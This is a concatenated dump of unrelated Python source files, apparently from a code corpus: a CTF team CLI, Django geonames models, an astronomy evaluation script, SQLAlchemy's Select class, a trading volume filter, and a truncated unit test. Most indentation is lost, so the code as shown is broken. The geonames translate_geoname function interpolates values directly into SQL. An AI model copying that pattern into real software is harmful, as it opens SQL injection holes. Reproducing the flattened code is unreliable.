max_stars: path=r8/cli/teams.py, repo=mhils/r8, head_hexsha=b5b0cfa5045213abe896eea450012924d3e1fe9c, licenses=["MIT"], count=14, stars_event=2018-09-19T15:17:38.000Z to 2022-01-14T10:59:55.000Z
max_issues: path=r8/cli/teams.py, repo=mhils/r8, head_hexsha=b5b0cfa5045213abe896eea450012924d3e1fe9c, licenses=["MIT"], count=3, issues_event=2019-05-29T16:47:36.000Z to 2020-05-02T18:16:17.000Z
max_forks: path=r8/cli/teams.py, repo=mhils/r8, head_hexsha=b5b0cfa5045213abe896eea450012924d3e1fe9c, licenses=["MIT"], count=3, forks_event=2020-12-19T01:12:15.000Z to 2021-02-27T21:29:43.000Z
content:
import click
import r8
from r8 import util
@click.group("teams")
def cli():
"""Team-related commands."""
pass
@cli.command("list")
@util.with_database()
@util.database_rows
def list(rows):
"""Print all teams."""
util.run_sql(f"""
SELECT tid, uid FROM teams
ORDER BY tid, uid DESC
""", rows=rows)
@cli.command()
@util.with_database()
@click.argument("old-name")
@click.argument("new-name")
def rename(old_name, new_name):
"""Change a team name."""
with r8.db:
old_exists = r8.db.execute("SELECT COUNT(*) FROM teams WHERE tid = ?", (old_name,)).fetchone()[0]
if not old_exists:
raise click.UsageError("Old team does not exist.")
new_exists = r8.db.execute("SELECT COUNT(*) FROM teams WHERE tid = ?", (new_name,)).fetchone()[0]
if new_exists:
raise click.UsageError("New team name does already exist.")
r8.db.execute("UPDATE teams SET tid = ? WHERE tid = ?", (new_name, old_name))
r8.echo("r8", f"""Renamed "{old_name}" to "{new_name}".""")
avg_line_length: 26.897436 | max_line_length: 105 | alphanum_fraction: 0.624404

hexsha: cccb09892483f6ae03bbe724290901da9613e607 | size: 13,621 | ext: py | lang: Python
max_stars: path=models.py, repo=philippWassibauer/geonames, head_hexsha=a479c5d903924af24dbd35b1caeab66a2d93fdd3, licenses=["MIT"], count=null, stars_event=null
max_issues: path=models.py, repo=philippWassibauer/geonames, head_hexsha=a479c5d903924af24dbd35b1caeab66a2d93fdd3, licenses=["MIT"], count=null, issues_event=null
max_forks: path=models.py, repo=philippWassibauer/geonames, head_hexsha=a479c5d903924af24dbd35b1caeab66a2d93fdd3, licenses=["MIT"], count=1, forks_event=2020-01-23T05:03:22.000Z to 2020-01-23T05:03:22.000Z
content:
# This file is part of Django-Geonames
# Copyright (c) 2008, Alberto Garcia Hierro
# See LICENSE file for details
from math import sin, cos, acos, radians
from django.core.cache import cache
from django.db import connection
from django.contrib.gis.db import models
from django.utils.translation import ugettext, get_language
from django.conf import settings
from geonames.decorators import stored_property, cache_set
GLOBE_GEONAME_ID = 6295630
def translate_geoname(g, lang):
cursor = connection.cursor()
cursor.execute('''SELECT name FROM alternate_name WHERE language='%(lang)s' \
AND geoname_id = %(id)d AND preferred=TRUE UNION SELECT name \
FROM alternate_name WHERE language='%(lang)s' AND geoname_id = %(id)d LIMIT 1''' % \
{ 'lang': lang, 'id': g.id })
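# The query is intended to prefer the alternate name flagged as preferred for
# the requested language, falling back to any alternate name in that language
# (LIMIT 1). Note that lang and id are interpolated directly into the SQL
# string, so callers are trusted to pass well-formed values.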
try:
return cursor.fetchone()[0]
except TypeError:
return g.name
def get_geo_translate_func():
try:
cnf = settings.GEONAMES_TRANSLATION_METHOD
except AttributeError:
cnf = 'NOOP'
if cnf == 'NOOP':
return (lambda x: x.name)
if cnf == 'STATIC':
lang = settings.LANGUAGE_CODE.split('-')[0]
if lang == 'en':
return (lambda x: x.name)
def geo_translate(self):
key = 'Geoname_%s_i18n_name' % self.id
return cache.get(key) or cache_set(key, translate_geoname(self, lang))
return geo_translate
if cnf == 'DYNAMIC':
def geo_translate(self):
lang = get_language()
key = 'Geoname_%s_%s_i18n_name' % (self.id, lang)
return cache.get(key) or cache_set(key, translate_geoname(self, lang))
return geo_translate
raise ValueError('Unknown value for GEONAMES_TRANSLATION_METHOD: "%s"' % cnf)
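# GEONAMES_TRANSLATION_METHOD selects how Geoname.i18n_name is resolved:
# 'NOOP' returns the stored name unchanged, 'STATIC' translates once into
# settings.LANGUAGE_CODE and caches one entry per geoname, and 'DYNAMIC'
# translates into the currently active Django language and caches one entry
# per (geoname, language) pair.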
geo_translate_func = get_geo_translate_func()
class Geoname(models.Model):
id = models.IntegerField(primary_key=True)
name = models.CharField(max_length=200, db_index=True)
ascii_name = models.CharField(max_length=200)
latitude = models.DecimalField(max_digits=20, decimal_places=17)
longitude = models.DecimalField(max_digits=20, decimal_places=17)
point = models.PointField(null=True, blank=True)
fclass = models.CharField(max_length=1, db_index=True)
fcode = models.CharField(max_length=10, db_index=True)
country = models.ForeignKey('Country', db_index=True, related_name='geoname_set')
cc2 = models.CharField(max_length=60)
admin1 = models.ForeignKey('Admin1Code', null=True, related_name='geoname_set', db_index=True)
admin2 = models.ForeignKey('Admin2Code', null=True, related_name='geoname_set', db_index=True)
admin3 = models.ForeignKey('Admin3Code', null=True, related_name='geoname_set', db_index=True)
admin4 = models.ForeignKey('Admin4Code', null=True, related_name='geoname_set', db_index=True)
population = models.IntegerField()
elevation = models.IntegerField()
gtopo30 = models.IntegerField()
timezone = models.ForeignKey('Timezone', null=True)
moddate = models.DateField()
objects = models.GeoManager()
class Meta:
db_table = 'geoname'
def __unicode__(self):
return self.name
def save(self, *args, **kwargs):
self.gpoint = 'POINT(%s %s)' % (self.longitude, self.latitude)
super(Geoname, self).save(*args, **kwargs)
@stored_property
def i18n_name(self):
return geo_translate_func(self)
@stored_property
def admin1_i18n_name(self):
if self.fcode in ('', 'CONT', 'PCLI'):
return u''
try:
return self.admin1.geoname.i18n_name
except (Admin1Code.DoesNotExist, Geoname.DoesNotExist):
return u''
@stored_property
def fcode_name(self):
try:
return ugettext(FeatureCode.objects.get(pk=self.fcode).name)
except FeatureCode.DoesNotExist:
return u''
@stored_property
def country_name(self):
try:
return self.country.__unicode__()
except Country.DoesNotExist:
return u''
@stored_property
def country_i18n_name(self):
try:
return self.country.geoname.i18n_name
except models.Model.DoesNotExist:
return u''
@stored_property
def parent(self):
if self.id == GLOBE_GEONAME_ID:
return None
return self.get_parent
def get_parent(self):
if self.fcode == 'CONT':
return Geoname.globe()
if self.fcode.startswith('PCL'):
g_list = [self.country.continent]
elif self.fcode in ('ADM1', 'ADMD'):
g_list = [self.country, self.country.continent]
elif self.fcode == 'ADM2':
g_list = [self.admin1, self.country, self.country.continent]
elif self.fcode == 'ADM3':
g_list = [self.admin2, self.admin1, self.country, self.country.continent]
elif self.fcode == 'ADM4':
g_list = [self.admin3, self.admin2, self.admin1, self.country, self.country.continent]
else:
g_list = [self.admin4, self.admin3, self.admin2, self.admin1, self.country, self.country.continent]
for g in g_list:
try:
if g.geoname_id != self.id:
return g.geoname
except AttributeError:
pass
return None
@stored_property
def hierarchy(self):
hier = []
parent = self.parent
while parent:
hier.append(parent)
parent = parent.parent
return hier
def get_children(self):
if self.id == GLOBE_GEONAME_ID:
return Geoname.objects.filter(id__in=[x['geoname'] for x in Continent.objects.values('geoname')])
if self.fcode == 'CONT':
return Geoname.objects.filter(id__in=[x['geoname'] for x in Continent.objects.get(geoname=self.id).country_set.values('geoname')])
if self.fclass != 'A':
return Geoname.objects.none()
try:
if self.fcode.startswith('PCL'):
s_list = [self.country.geoname_set.filter(fcode=code) for code in ('ADM1', 'ADMD', 'ADM2', 'ADM3', 'ADM4')] + [self.country.geoname_set.filter(fclass='P')]
elif self.fcode == 'ADM1':
s_list = [self.admin1.geoname_set.filter(fcode=code) for code in ('ADM2', 'ADM3', 'ADM4')] + [self.admin1.geoname_set.filter(fclass='P')]
elif self.fcode == 'ADM2':
s_list = [self.admin2.geoname_set.filter(fcode=code) for code in ('ADM3', 'ADM4')] + [self.admin2.geoname_set.filter(fclass='P')]
elif self.fcode == 'ADM3':
s_list = [self.admin3.geoname_set.filter(fcode='ADM4'), self.admin3.geoname_set.filter(fclass='P')]
elif self.fcode == 'ADM4':
s_list = [self.admin4.geoname_set.filter(fclass='P')]
else:
return Geoname.objects.none()
except AttributeError:
return Geoname.objects.none()
for qs in s_list:
if qs.count():
return qs
return Geoname.objects.none()
@stored_property
def children(self):
cset = self.get_children()
l = list(cset or [])
l.sort(cmp=lambda x,y: cmp(x.i18n_name, y.i18n_name))
return l
@classmethod
def biggest(cls, lset):
codes = [ '', 'CONT', 'PCLI', 'ADM1', 'ADM2', 'ADM3', 'ADM4', 'PPL']
for c in codes:
for item in lset:
if item.fcode == c:
return item
try:
return lset[0]
except IndexError:
return None
@classmethod
def globe(cls):
return cls.objects.get(pk=GLOBE_GEONAME_ID)
def is_globe(self):
return self.id == GLOBE_GEONAME_ID
def contains(self, child):
if self.is_globe():
return True
try:
if self.fcode == 'CONT':
return child.country.continent.geoname == self
if self.fcode in ('PCLI', 'PCLD'):
return child.country_id == self.country_id
if self.fcode == 'ADM1':
return self.admin1_id == child.admin1_id
if self.fcode == 'ADM2':
return self.admin2_id == child.admin2_id
if self.fcode == 'ADM3':
return self.admin3_id == child.admin3_id
if self.fcode == 'ADM4':
return self.admin4_id == child.admin4_id
except Country.DoesNotExist:
return False
return False
def distance(self, other):
return Geoname.distance_points(self.latitude, self.longitude, other.latitude, other.longitude)
@classmethod
def distance_points(cls, lat1, lon1, lat2, lon2, is_rad=False):
if not is_rad:
lat1, lon1, lat2, lon2 = map(lambda x: radians(float(x)), (lat1, lon1, lat2, lon2))
return 6378.7 * acos(sin(lat1) * sin(lat2) + cos(lat1) * cos(lat2) * cos(lon2 - lon1))
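# distance_points is the spherical law of cosines on a sphere of radius
# 6378.7 km:
#   d = R * acos(sin(lat1)*sin(lat2) + cos(lat1)*cos(lat2)*cos(lon2 - lon1))
# For example, distance_points(52.52, 13.405, 48.8566, 2.3522) (Berlin to
# Paris) comes out at roughly 880 km; pass is_rad=True if the inputs are
# already in radians.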
class GeonameAlternateName(models.Model):
id = models.IntegerField(primary_key=True)
geoname = models.ForeignKey(Geoname, related_name='altnames', db_index=True)
language = models.CharField(max_length=7)
name = models.CharField(max_length=200)
preferred = models.BooleanField()
short = models.BooleanField()
class Meta:
db_table = 'alternate_name'
def __unicode__(self):
return self.alternateName
class Continent(models.Model):
code = models.CharField(max_length=2, primary_key=True)
name = models.CharField(max_length=20)
geoname = models.ForeignKey(Geoname, unique=True)
class Meta:
db_table = 'continent'
def __unicode__(self):
return self.name
class Country(models.Model):
iso_alpha2 = models.CharField(max_length=2, primary_key=True)
iso_alpha3 = models.CharField(max_length=3, unique=True)
iso_numeric = models.IntegerField(unique=True)
fips_code = models.CharField(max_length=3)
name = models.CharField(max_length=200)
capital = models.CharField(max_length=200)
area = models.FloatField()
population = models.IntegerField()
continent = models.ForeignKey(Continent, db_index=True)
tld = models.CharField(max_length=4, null=True)
currency_code = models.CharField(max_length=3)
currency_name = models.CharField(max_length=16, null=True)
phone_prefix = models.CharField(max_length=16, null=True)
postal_code_fmt = models.CharField(max_length=64, null=True)
postal_code_re = models.CharField(max_length=256, null=True)
languages = models.CharField(max_length=200)
geoname = models.ForeignKey(Geoname, related_name='this_country')
neighbours = models.ManyToManyField('self')
class Meta:
db_table = 'country'
def __unicode__(self):
return self.name
class Language(models.Model):
iso_639_3 = models.CharField(max_length=4, primary_key=True)
iso_639_2 = models.CharField(max_length=50)
iso_639_1 = models.CharField(max_length=50)
language_name = models.CharField(max_length=200)
class Meta:
db_table = 'iso_language'
class Admin1Code(models.Model):
country = models.ForeignKey(Country, db_index=True)
geoname = models.ForeignKey(Geoname, db_index=True)
code = models.CharField(max_length=5)
name = models.TextField()
ascii_name = models.TextField()
geom = models.GeometryField(null=True, blank=True)
class Meta:
db_table = 'admin1_code'
class Admin2Code(models.Model):
country = models.ForeignKey(Country, db_index=True)
admin1 = models.ForeignKey(Admin1Code, null=True)
geoname = models.ForeignKey(Geoname, db_index=True)
code = models.CharField(max_length=30)
name = models.TextField()
ascii_name = models.TextField()
geom = models.GeometryField(null=True, blank=True)
class Meta:
db_table = 'admin2_code'
class Admin3Code(models.Model):
country = models.ForeignKey(Country, db_index=True)
admin1 = models.ForeignKey(Admin1Code, null=True, db_index=True)
admin2 = models.ForeignKey(Admin2Code, null=True, db_index=True)
geoname = models.ForeignKey(Geoname, db_index=True)
code = models.CharField(max_length=30)
name = models.TextField()
ascii_name = models.TextField()
geom = models.GeometryField(null=True, blank=True)
class Meta:
db_table = 'admin3_code'
class Admin4Code(models.Model):
country = models.ForeignKey(Country)
admin1 = models.ForeignKey(Admin1Code, null=True, db_index=True)
admin2 = models.ForeignKey(Admin2Code, null=True, db_index=True)
admin3 = models.ForeignKey(Admin3Code, null=True, db_index=True)
geoname = models.ForeignKey(Geoname, db_index=True)
code = models.CharField(max_length=30)
name = models.TextField()
ascii_name = models.TextField()
geom = models.GeometryField(null=True, blank=True)
class Meta:
db_table = 'admin4_code'
class FeatureCode(models.Model):
code = models.CharField(max_length=7, primary_key=True)
fclass = models.CharField(max_length=1)
name = models.CharField(max_length=200)
description = models.TextField()
class Meta:
db_table = 'feature_code'
class Timezone(models.Model):
name = models.CharField(max_length=200)
gmt_offset = models.DecimalField(max_digits=4, decimal_places=2)
dst_offset = models.DecimalField(max_digits=4, decimal_places=2)
class Meta:
db_table = 'time_zone'
class GeonamesUpdate(models.Model):
updated_date = models.DateField()
class Meta:
db_table = 'geonames_update'
avg_line_length: 34.836317 | max_line_length: 171 | alphanum_fraction: 0.647236

hexsha: 0ad6571627f4bc1eb4190c8061b453b2a9137ebe | size: 5,061 | ext: py | lang: Python
max_stars: path=scripts/evaluate_solution.py, repo=steven-murray/analytic_diffuse, head_hexsha=b82fea27da4c476b4d04c2a0d8959e5af38bdd09, licenses=["MIT"], count=null, stars_event=null
max_issues: path=scripts/evaluate_solution.py, repo=steven-murray/analytic_diffuse, head_hexsha=b82fea27da4c476b4d04c2a0d8959e5af38bdd09, licenses=["MIT"], count=null, issues_event=null
max_forks: path=scripts/evaluate_solution.py, repo=steven-murray/analytic_diffuse, head_hexsha=b82fea27da4c476b4d04c2a0d8959e5af38bdd09, licenses=["MIT"], count=null, forks_event=null
content:
# script to evaluate a given visibility solution and save to npz.
# optionally -- parse a pyuvdata-compatible file to get baseline vectors etc. and save alongside evaluated data.
# give model parameters (and name) as arguments. Option to parse a filename for that info too.
import numpy as np
import os
import argparse
from pyuvdata import UVData
from healvis.cosmology import c_ms
from healvis.utils import jy2Tsr
import analytic_diffuse as andiff
parser = argparse.ArgumentParser(
description="Evaluate a given visibility solution and save results to an npz file."
)
parser.add_argument('-v', '--visfile', type=str, help='pyuvdata-compatible visibility data file')
parser.add_argument('--infile', type=str, help='Input npz file containing uvw vectors')
helpstr = 'Model name. Available: ' + ', '.join(andiff.available_models)
parser.add_argument('--model', type=str, help=helpstr, default=None)
parser.add_argument('-a', type=float, help='a parameter for gaussian and xysincs models.', default=None)
parser.add_argument('--el0vec', type=str, help='(l,m,n) coordinate vector for center displacement from zenith. Comma-delimited string.', default=None, required=False)
parser.add_argument('--el0ang', type=str, help='(azimuth, zenith angle) coordinate vector for center position.', default=None)
parser.add_argument('--xi', type=float, help='Xi parameter for xysincs model.', default=None)
parser.add_argument('-n', type=int, help='Polynomial order for polydome model.', default=None)
parser.add_argument('--order', type=int, help='Expansion order, for series solutions.')
parser.add_argument('--amp', type=float, help='Amplitude of the model in K. Default is 2 K.', default=2)
parser.add_argument('--maxu', type=float, help='Maximum baseline length in wavelengths.')
parser.add_argument('-o', '--ofname', type=str, help='Output npz file name', default=None)
args = parser.parse_args()
if args.el0vec is not None:
args.el0vec = list(map(float, args.el0vec.split(',')))
assert len(args.el0vec) == 3
if args.el0ang is not None:
args.el0ang = list(map(float, args.el0ang.split(',')))
assert len(args.el0ang) == 2
if args.el0vec is None:
args.el0vec = andiff.models._angle_to_lmn(*args.el0ang).squeeze()
args.el0vec[2] = 0 # Scrap w component
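# _angle_to_lmn converts the (azimuth, zenith angle) pair into direction
# cosines (l, m, n); the third component is zeroed above so that only the
# tangent-plane offset (l, m) of the model centre is kept.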
outdict = {}
# NOTE: the optional --maxu baseline-length cut can only be applied after uvw
# has been loaded below; computing it here would reference uvw before it exists.
uv = UVData()
if args.visfile is None:
if args.model is None:
raise ValueError("Model type needed.")
if args.infile is None:
raise ValueError("Input npz file needed.")
f = np.load(args.infile)
uvw = f['uvws']
if args.maxu is not None:
    uvw = uvw[np.linalg.norm(uvw, axis=1) < args.maxu]
elif args.visfile is not None and args.infile is not None:
raise ValueError("Cannot do both npz and uv input files at once.")
else:
uv.read(args.visfile)
print("Using visibility file {}".format(args.visfile))
uv.select(times=uv.time_array[0]) # Select first time only.
dat = uv.data_array[:,0,:,0]
lam = c_ms/uv.freq_array[0]
dat_Tsr = dat * jy2Tsr(uv.freq_array[0], bm=1.0)
uvw = np.repeat(uv.uvw_array[:,:,None], uv.Nfreqs, axis=2)
uvw = np.swapaxes((uvw/lam), 1,2)
uvw = uvw.reshape((uv.Nbls * uv.Nfreqs, 3))
dat_Tsr = dat_Tsr.flatten()
if args.maxu is not None:
    sel = np.linalg.norm(uvw, axis=1) < args.maxu
    uvw = uvw[sel]
    dat_Tsr = dat_Tsr[sel]
if args.model is None:
model, params = andiff.solutions.parse_filename(os.path.basename(args.visfile))
args.model = model
for k, v in params.items():
if (hasattr(args, k)) and (getattr(args, k) is None):
setattr(args, k, v)
outdict['dat_Tsr'] = dat_Tsr
outdict['uvws'] = uvw
for key, val in vars(args).items():
if val is not None:
outdict[key] = val
# Next -- evaluate function, then save things to npz file.
analytic = andiff.get_solution(args.model)
params = {}
keys = ['a', 'n', 'xi', 'el0vec', 'order']
for k in keys:
val = getattr(args, k)
if val is not None:
params[k] = val
if ('gauss' in args.model) or ('xysincs' in args.model):
a = params.pop('a')
if a is None:
raise ValueError("Missing parameter 'a' for {}.".format(args.model))
outdict['result'] = args.amp * analytic(uvw, a, **params)
params['a'] = a
else:
outdict['result'] = args.amp * analytic(uvw, **params)
if args.ofname is None:
if args.infile is None:
args.ofname = "ana_comp_"+args.model
else:
args.ofname = "ana_eval_"+args.model # Comp for data comp, eval for just evaluation
for k, val in params.items():
if isinstance(val, int):
args.ofname += '_{}{:d}'.format(k, val)
elif k == 'el0vec':
zenang = np.degrees(np.arcsin(np.linalg.norm(val)))
args.ofname += '_offzen{:.1f}'.format(zenang)
else:
args.ofname += '_{}{:.2f}'.format(k, val)
if 'nside' in uv.extra_keywords.keys():
args.ofname += '_nside{}'.format(uv.extra_keywords['nside'])
args.ofname += ".npz"
print("Saving results to {}".format(args.ofname))
np.savez(args.ofname, **outdict)
avg_line_length: 38.052632 | max_line_length: 166 | alphanum_fraction: 0.666469

hexsha: 407ec963320ad44058cec9b738a0fe93b423899c | size: 5,287 | ext: py | lang: Python
max_stars: path=lib/sqlalchemy/future/selectable.py, repo=abrahamsangha/sqlalchemy, head_hexsha=3ab2364e78641c4f0e4b6456afc2cbed39b0d0e6, licenses=["MIT"], count=null, stars_event=null
max_issues: path=lib/sqlalchemy/future/selectable.py, repo=abrahamsangha/sqlalchemy, head_hexsha=3ab2364e78641c4f0e4b6456afc2cbed39b0d0e6, licenses=["MIT"], count=null, issues_event=null
max_forks: path=lib/sqlalchemy/future/selectable.py, repo=abrahamsangha/sqlalchemy, head_hexsha=3ab2364e78641c4f0e4b6456afc2cbed39b0d0e6, licenses=["MIT"], count=null, forks_event=null
content:
from ..sql import coercions
from ..sql import roles
from ..sql.base import _generative
from ..sql.selectable import GenerativeSelect
from ..sql.selectable import Select as _LegacySelect
from ..sql.selectable import SelectState
from ..sql.util import _entity_namespace_key
class Select(_LegacySelect):
_is_future = True
_setup_joins = ()
_legacy_setup_joins = ()
@classmethod
def _create_select(cls, *entities):
raise NotImplementedError("use _create_future_select")
@classmethod
def _create_future_select(cls, *entities):
r"""Construct a new :class:`_expression.Select` using the 2.
x style API.
.. versionadded:: 2.0 - the :func:`_future.select` construct is
the same construct as the one returned by
:func:`_expression.select`, except that the function only
accepts the "columns clause" entities up front; the rest of the
state of the SELECT should be built up using generative methods.
Similar functionality is also available via the
:meth:`_expression.FromClause.select` method on any
:class:`_expression.FromClause`.
.. seealso::
:ref:`coretutorial_selecting` - Core Tutorial description of
:func:`_expression.select`.
:param \*entities:
Entities to SELECT from. For Core usage, this is typically a series
of :class:`_expression.ColumnElement` and / or
:class:`_expression.FromClause`
objects which will form the columns clause of the resulting
statement. For those objects that are instances of
:class:`_expression.FromClause` (typically :class:`_schema.Table`
or :class:`_expression.Alias`
objects), the :attr:`_expression.FromClause.c`
collection is extracted
to form a collection of :class:`_expression.ColumnElement` objects.
This parameter will also accept :class:`_expression.TextClause`
constructs as
given, as well as ORM-mapped classes.
"""
self = cls.__new__(cls)
self._raw_columns = [
coercions.expect(
roles.ColumnsClauseRole, ent, apply_propagate_attrs=self
)
for ent in entities
]
GenerativeSelect.__init__(self)
return self
def filter(self, *criteria):
"""A synonym for the :meth:`_future.Select.where` method."""
return self.where(*criteria)
def _exported_columns_iterator(self):
meth = SelectState.get_plugin_class(self).exported_columns_iterator
return meth(self)
def _filter_by_zero(self):
if self._setup_joins:
meth = SelectState.get_plugin_class(
self
).determine_last_joined_entity
_last_joined_entity = meth(self)
if _last_joined_entity is not None:
return _last_joined_entity
if self._from_obj:
return self._from_obj[0]
return self._raw_columns[0]
def filter_by(self, **kwargs):
r"""apply the given filtering criterion as a WHERE clause
to this select.
"""
from_entity = self._filter_by_zero()
clauses = [
_entity_namespace_key(from_entity, key) == value
for key, value in kwargs.items()
]
return self.filter(*clauses)
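# Sketch (assuming an ORM-mapped ``User`` class with a ``name`` attribute):
#   select(User).filter_by(name="spongebob")
# builds the same statement as
#   select(User).where(User.name == "spongebob")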
@property
def column_descriptions(self):
"""Return a 'column descriptions' structure which may be
plugin-specific.
"""
meth = SelectState.get_plugin_class(self).get_column_descriptions
return meth(self)
@_generative
def join(self, target, onclause=None, isouter=False, full=False):
r"""Create a SQL JOIN against this :class:`_expresson.Select`
object's criterion
and apply generatively, returning the newly resulting
:class:`_expression.Select`.
"""
target = coercions.expect(
roles.JoinTargetRole, target, apply_propagate_attrs=self
)
self._setup_joins += (
(target, onclause, None, {"isouter": isouter, "full": full}),
)
@_generative
def join_from(
self, from_, target, onclause=None, isouter=False, full=False
):
r"""Create a SQL JOIN against this :class:`_expresson.Select`
object's criterion
and apply generatively, returning the newly resulting
:class:`_expression.Select`.
"""
# note the order of parsing from vs. target is important here, as we
# are also deriving the source of the plugin (i.e. the subject mapper
# in an ORM query) which should favor the "from_" over the "target"
from_ = coercions.expect(
roles.FromClauseRole, from_, apply_propagate_attrs=self
)
target = coercions.expect(
roles.JoinTargetRole, target, apply_propagate_attrs=self
)
self._setup_joins += (
(target, onclause, from_, {"isouter": isouter, "full": full}),
)
def outerjoin(self, target, onclause=None, full=False):
"""Create a left outer join.
"""
return self.join(target, onclause=onclause, isouter=True, full=full,)
avg_line_length: 32.435583 | max_line_length: 78 | alphanum_fraction: 0.632117

hexsha: 161ab0379c67974e3c7c09f7565ed3a6a49d5275 | size: 5,218 | ext: py | lang: Python
max_stars: path=qf_lib/backtesting/orders_filter/volume_orders_filter.py, repo=quarkfin/QF-Lib, head_hexsha=1504c65c9ed8bbbd19948088fe7b924a7b6be709, licenses=["Apache-2.0"], count=null, stars_event=null
max_issues: path=qf_lib/backtesting/orders_filter/volume_orders_filter.py, repo=quarkfin/QF-Lib, head_hexsha=1504c65c9ed8bbbd19948088fe7b924a7b6be709, licenses=["Apache-2.0"], count=null, issues_event=null
max_forks: path=qf_lib/backtesting/orders_filter/volume_orders_filter.py, repo=quarkfin/QF-Lib, head_hexsha=1504c65c9ed8bbbd19948088fe7b924a7b6be709, licenses=["Apache-2.0"], count=null, forks_event=null
content:
# Copyright 2016-present CERN – European Organization for Nuclear Research
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import math
from typing import List, Optional, Tuple
import numpy as np
from qf_lib.backtesting.order.execution_style import StopOrder
from qf_lib.backtesting.order.order import Order
from qf_lib.backtesting.orders_filter.orders_filter import OrdersFilter
from qf_lib.common.enums.frequency import Frequency
from qf_lib.common.enums.price_field import PriceField
from qf_lib.common.tickers.tickers import Ticker
from qf_lib.common.utils.numberutils.is_finite_number import is_finite_number
from qf_lib.containers.dataframe.qf_dataframe import QFDataFrame
from qf_lib.data_providers.data_provider import DataProvider
class VolumeOrdersFilter(OrdersFilter):
""" Verifies whether the orders sizes do not exceed the given volume limit.
Parameters
-----------
data_provider: DataProvider
used to download the volume data
volume_percentage_limit: float
defines the maximum percentage of the volume value, that the orders size should not exceed
"""
def __init__(self, data_provider: DataProvider, volume_percentage_limit: float):
super().__init__(data_provider)
self._volume_percentage_limit = volume_percentage_limit
def adjust_orders(self, orders: List[Order]) -> List[Order]:
""" Takes list of orders and based on them creates a new list with orders, whose size does not to exceed the
given volume limits. The Orders are changed in place.
Parameters
----------
orders: List[Order]
list of orders to adjust
Returns
--------
List[Order]
list of orders, that do not exceed the given volume percentage limit
"""
tickers = [order.ticker for order in orders]
try:
volume_df = self._data_provider.historical_price(tickers, PriceField.Volume, 5, frequency=Frequency.DAILY)
# The stop orders will be adjusted only along with corresponding market orders
stop_orders_dict = {order.ticker: order for order in orders if isinstance(order.execution_style, StopOrder)}
adjusted_orders_tuples = [self._adjust_quantity(order, stop_orders_dict.get(order.ticker, None), volume_df)
for order in orders if not isinstance(order.execution_style, StopOrder)]
# Flatten the list of orders tuples
adjusted_orders = [order for orders_tuple in adjusted_orders_tuples
for order in orders_tuple if order is not None and order.quantity != 0]
return adjusted_orders
except ValueError as e:
self.logger.warning(f"VolumeOrdersFilter: orders cannot be adjusted due to the following reason: {e}",
stack_info=True)
return orders
def _adjust_quantity(self, order: Order, stop_order: Optional[Order], volume_df: QFDataFrame) -> \
Tuple[Order, Order]:
"""Returns order with adjusted quantity if applicable."""
ticker = order.ticker
def average_past_volume(ticker: Ticker) -> Optional[float]:
volume_series = volume_df[ticker]
volume_series = volume_series.dropna()
volume_series = volume_series[volume_series >= 0]
return volume_series.mean()
past_volume = average_past_volume(ticker)
if is_finite_number(past_volume):
volume_limit: int = math.floor(past_volume * self._volume_percentage_limit)
# Check if the order quantity exceeds the limit
if abs(order.quantity) > volume_limit:
final_quantity = volume_limit * np.sign(order.quantity)
adjustment_difference = final_quantity - order.quantity
self.logger.info("VolumeOrdersFilter: Quantity change {} "
"\n\tfinal quantity: {}".format(order, final_quantity))
order.quantity = final_quantity
if stop_order:
# Adjust the corresponding stop order
stop_order_final_quantity = stop_order.quantity - adjustment_difference
self.logger.info("VolumeOrdersFilter: Quantity change {} "
"\n\tfinal quantity: {}".format(stop_order, final_quantity))
stop_order.quantity = stop_order_final_quantity
return order, stop_order
def __str__(self):
return 'VolumeOrdersFilter:\n' \
'\tvolume_percentage_limit: {}\n'.format(self._volume_percentage_limit)
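# --- Illustrative sketch (not part of the original qf_lib module) --------------
# The capping rule applied by _adjust_quantity above, reduced to plain numbers:
# the allowed size is floor(mean past volume * volume_percentage_limit) and the
# requested quantity is clipped to that size while keeping its sign.  All the
# figures below are made up and serve only as a worked example (math is already
# imported at the top of this file).
if __name__ == "__main__":
    past_volumes = [1200.0, 900.0, 1100.0]      # hypothetical 3-day volume history
    volume_percentage_limit = 0.1               # cap orders at 10% of the average volume
    volume_limit = math.floor(sum(past_volumes) / len(past_volumes) * volume_percentage_limit)
    requested_quantity = -250
    if abs(requested_quantity) > volume_limit:
        requested_quantity = volume_limit * (1 if requested_quantity > 0 else -1)
    assert volume_limit == 106                  # floor(1066.67 * 0.1)
    assert requested_quantity == -106           # clipped, sign preserved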
| 45.373913
| 120
| 0.673246
|
f82a49482c561a06c31f66897e3a6dc16406c335
| 7,295
|
py
|
Python
|
model-optimizer/mo/front/common/partial_infer/multi_box_detection_test.py
|
zhoub/dldt
|
e42c01cf6e1d3aefa55e2c5df91f1054daddc575
|
[
"Apache-2.0"
] | 3
|
2020-02-09T23:25:37.000Z
|
2021-01-19T09:44:12.000Z
|
model-optimizer/mo/front/common/partial_infer/multi_box_detection_test.py
|
zhoub/dldt
|
e42c01cf6e1d3aefa55e2c5df91f1054daddc575
|
[
"Apache-2.0"
] | null | null | null |
model-optimizer/mo/front/common/partial_infer/multi_box_detection_test.py
|
zhoub/dldt
|
e42c01cf6e1d3aefa55e2c5df91f1054daddc575
|
[
"Apache-2.0"
] | 2
|
2020-04-18T16:24:39.000Z
|
2021-01-19T09:42:19.000Z
|
"""
Copyright (c) 2018-2019 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import unittest
import numpy as np
from mo.front.common.partial_infer.multi_box_detection import multi_box_detection_infer
from mo.graph.graph import Node
from mo.utils.unittest.graph import build_graph
nodes_attributes = {'node_1': {'value': None, 'kind': 'data'},
'node_2': {'value': None, 'kind': 'data'},
'node_3': {'value': None, 'kind': 'data'},
'detection_output_1': {'type': 'DetectionOutput', 'value': None, 'kind': 'op'},
'node_4': {'value': None, 'kind': 'data'}
}
class TestMultiBoxDetectionInfer(unittest.TestCase):
def test_prior_box_infer_ideal(self):
graph = build_graph(nodes_attributes,
[('node_1', 'detection_output_1'),
